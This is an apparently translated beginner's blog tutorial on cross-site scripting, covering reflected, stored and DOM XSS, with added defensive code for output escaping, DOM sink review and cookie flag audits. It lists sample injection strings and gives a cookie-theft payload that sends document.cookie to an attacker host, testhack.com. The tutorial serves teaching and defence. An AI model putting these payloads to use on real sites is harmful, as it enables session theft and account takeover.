Learning web security from scratch (1)

Source: Internet
Author: User

I have always been interested in web security, but have only ever understood a little of it. I have decided to learn web security properly from now on and to keep updating this Web Security series. The content of these articles is written as I learn; I hope you find it useful as a reference.

Typical web attacks include XSS, CSRF and UI hijacking (clickjacking). Right now all of them are unknown to me, so let's start with XSS. This article is about XSS and the content is fairly basic: if you are already familiar with XSS you can skip this one and follow the later articles in the series, where we continue learning XSS ~~

XSS Overview

Cross-Site Scripting (XSS) is the most common vulnerability in web applications. An attacker embeds a client-side script (usually JavaScript) in a web page; when a user views that page, the script runs in the user's browser and achieves the attacker's goals. For example, an attacker can read the user's cookies, redirect the user to a malicious website, or deliver a Trojan.

XSS Category 1: reflected XSS

Reflected XSS is also known as non-persistent XSS. It is called "reflected" because the injected code is reflected back from the target server, for example in an error message or a search result. A non-persistent XSS attack is one-shot: the attacker sends the victim, for example by email, a malicious link that contains the injected script; when the victim clicks the link, the script is sent to the target server, the server reflects it back into the victim's browser, and the browser executes it.

Although reflected XSS is relatively less harmful, it is probably the most widely used form of XSS. That is a lot of concepts, and I suspect anyone new to XSS still has no idea what it actually is, so let's look at a simple demo:

Suppose the page at http://www.test.com/xss/reflect.php contains code like the following, with an XSS vulnerability:

 

Because the value of the parameter x is output directly into the page without any filtering, one can submit:

http://www.test.com/xss/reflect.php?x=<script>alert(1)</script>

This code is a reflected XSS. Of course, only a user who opens this URL is attacked, so the attacker has to lure the user into clicking it; once clicked, the script in the URL is executed. alert is just an example; replace it with code that, say, sends the user's cookie to the attacker's server, and the attacker obtains the victim's cookie for www.test.com, logs in as them and does all kinds of things .. I will look at the topic of the "payload" later ~~

Type 2: stored XSS

Stored XSS stores the user-submitted data on the server. This type of XSS is highly stable and very harmful, and is also called persistent XSS.

The most typical example is a message board. A user submits a message containing XSS code, which is stored in the database. When the target user views the message board, the message is read from the database and displayed, and the browser parses and executes the XSS code as ordinary HTML and JavaScript, triggering the XSS attack.
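The fix for both the reflect.php case and the message-board case is the same: encode untrusted data at the output point. The following is an added example, not code from the original article, written in Node.js rather than PHP; the function names (escapeHtml, renderReflectSafe, renderMessageBoard) and the sample messages are my own.

```javascript
// Added example (not from the original article): the server-side "output point"
// from reflect.php and the message board, written in Node.js instead of PHP.
// Untrusted input is HTML-encoded before being placed in the page, so the
// payload forms the article lists are rendered as text instead of executed.

// Encode the five characters that matter in HTML element and attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable version of reflect.php?x=... : the parameter is echoed unchanged.
function renderReflectUnsafe(x) {
  return `<p>You searched for: ${x}</p>`;
}

// Fixed version: every untrusted value goes through escapeHtml at the output point.
function renderReflectSafe(x) {
  return `<p>You searched for: ${escapeHtml(x)}</p>`;
}

// Stored case: messages come back from the database and are rendered for every
// visitor, so the encoding must happen when the message is displayed.
// `author` lands in an attribute and `body` in element content; both are encoded,
// which also neutralises the attribute-breakout payload form (" onmouseover=...).
function renderMessageBoard(messages) {
  const items = messages.map(
    (m) => `<li title="${escapeHtml(m.author)}">${escapeHtml(m.body)}</li>`
  );
  return `<ul>\n${items.join('\n')}\n</ul>`;
}

// Constructed sample input using two of the payload forms from the article.
const storedMessages = [
  { author: 'alice', body: 'hello' },
  { author: '" onmouseover=alert(1) x="', body: '<script>alert(1)</script>' },
];
```

The same encoder is not enough for data placed inside a script block or a URL; those contexts need their own encoding, which is why "filtering" at the input point alone does not solve XSS.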

 

Type 3: DOM XSS

DOM XSS differs from reflected and stored XSS in that its XSS code does not need to pass through the server's response at all: the XSS is triggered by the browser's own DOM parsing, so it can be thought of as purely client-side. Front-end developers in particular should pay attention to this type of XSS.

A very simple example:

<script>eval(location.hash.substr(1));</script>

The XSS is triggered with:

http://www.test.com/xssme.html#alert(1)

The whole process has nothing to do with the server; an attacker simply lures someone into clicking a URL carrying the XSS code. When I had just graduated I did not accept that I should not use eval, and some developers are still confident that they can use eval and keep their code correct. But wherever there is an "output point" there is a risk, and eval adds one more way to be hit by XSS! If it can be left out, it is better not to write it ~
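A simple way to catch the eval(location.hash) pattern during code review is to look for lines where a client-controlled source reaches a dangerous sink. The following is an added example, not from the original article; the source and sink lists, the function name findDomXssCandidates and the sample script lines are my own.

```javascript
// Added example (not from the original article): a crude source-to-sink check
// for DOM XSS, run over constructed lines of page script. It flags a line when a
// client-controlled source (location.hash, location.search, document.referrer...)
// feeds a dangerous sink (eval, innerHTML, document.write, Function, string
// setTimeout) on the same line. It is a review aid, not a parser; real tools do
// dataflow analysis across statements.

const DOM_SOURCES = /location\.(hash|search|href)|document\.(referrer|URL)/;
const DOM_SINKS = /\beval\s*\(|\.innerHTML\s*=|document\.write(ln)?\s*\(|\bnew\s+Function\s*\(|setTimeout\s*\(\s*["'`]/;

// Returns one finding per line that contains both a source and a sink.
function findDomXssCandidates(sourceText) {
  const findings = [];
  sourceText.split('\n').forEach((line, i) => {
    const src = line.match(DOM_SOURCES);
    const sink = line.match(DOM_SINKS);
    if (src && sink) {
      findings.push({ line: i + 1, source: src[0], sink: sink[0].trim(), code: line.trim() });
    }
  });
  return findings;
}

// Constructed sample: line 1 is the article's xssme.html pattern, line 2 a common
// innerHTML variant, lines 3-5 a safe rewrite that treats the fragment as data,
// looks it up in an allowlist, and writes it to the page as text only.
const SAMPLE_PAGE_SCRIPT = [
  'eval(location.hash.substr(1));',
  'document.getElementById("out").innerHTML = location.search.slice(1);',
  'const tabs = { home: showHome, help: showHelp };',
  'const tab = tabs[location.hash.slice(1)] || tabs.home;',
  'document.getElementById("out").textContent = location.hash;',
].join('\n');
```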

XSS payload

In the demo above we talked about stealing the user's cookie, which is a common XSS payload. So what is an XSS payload?

After an XSS attack succeeds, the attacker can implant malicious scripts into the page the user is currently viewing in order to control the user's browser. These malicious scripts, which carry out specific functions, are called the "XSS payload".

An XSS payload is really just a JavaScript script (or Flash or another rich-client script), so an XSS payload can do anything that JavaScript can.

Here are a few simple payload forms; there are many more, and you can look them up:

<script>alert(1)</script>
'"><script>alert(1)</script>
'" alert(1)
' onmouseover=alert(1) x='
" onmouseover=alert(1) x="
</script><script>alert(1)
<Script>alert(1)</Script>

Of course, as I just said, listing these does not by itself explain anything; later articles will get to them gradually. Let's look at the cookie theft demo mentioned earlier:

 // Create an image element; the request for its src carries the cookie
 var img = document.createElement('img');
 // The logging endpoint on the other server receives document.cookie as the query string
 img.src = "http://www.testhack.com/log?" + escape(document.cookie);
 // Appending the image makes the browser issue the request
 document.body.appendChild(img);

This is a simple cookie theft payload. In the XSS example, we just replace the alert(1) code with the code above; as long as the user is tricked into clicking the URL with the XSS code, the cookie for test.com is sent to the attacker's server testhack.com ~ Get the cookie, and then blah blah ~~~
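The check a defender wants against this payload is whether the session cookie is even readable from document.cookie. The following is an added example, not from the original article; parseSetCookie, auditSetCookie, the session cookie names and the sample headers are my own.

```javascript
// Added example (not from the original article): an audit of Set-Cookie headers
// for the flags that limit the damage of the cookie-theft payload above.
// HttpOnly keeps document.cookie from exposing the cookie to script at all, and
// Secure keeps it off plain HTTP. Note that HttpOnly protects only the cookie
// value: a successful XSS can still act as the user from inside the page.
// The sample headers below are constructed.

// Parse one Set-Cookie header value into its cookie name and lowercase attribute set.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return { name, flags };
}

// Returns the problems found for one header; an empty list means it passes.
// sessionNames defaults to PHP's PHPSESSID plus a generic name (assumed set).
function auditSetCookie(header, { sessionNames = ['PHPSESSID', 'sessionid'] } = {}) {
  const { name, flags } = parseSetCookie(header);
  const problems = [];
  if (sessionNames.includes(name)) {
    if (!flags.has('httponly')) problems.push(`${name}: missing HttpOnly (readable via document.cookie)`);
    if (!flags.has('secure')) problems.push(`${name}: missing Secure`);
  }
  return problems;
}

// Audit every Set-Cookie header of a response.
function auditAll(headers) {
  return headers.flatMap((h) => auditSetCookie(h));
}

// Constructed sample: a weak session cookie, a hardened one, and a harmless preference.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];
```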

As I understand it, if a piece of code has no data "input point" or "output point", XSS is impossible; but how can code have no input point or output point ~~ After reading this brief introduction you may still feel that your own code is free of problems and that what you write is safe. Is that really true .. During my learning process I have found that my code has many problems, and many things I never thought of before ..

This article is only a brief introduction to the basics of XSS. The rest of the series will go further; the next article continues with XSS ~

To be continued ~~

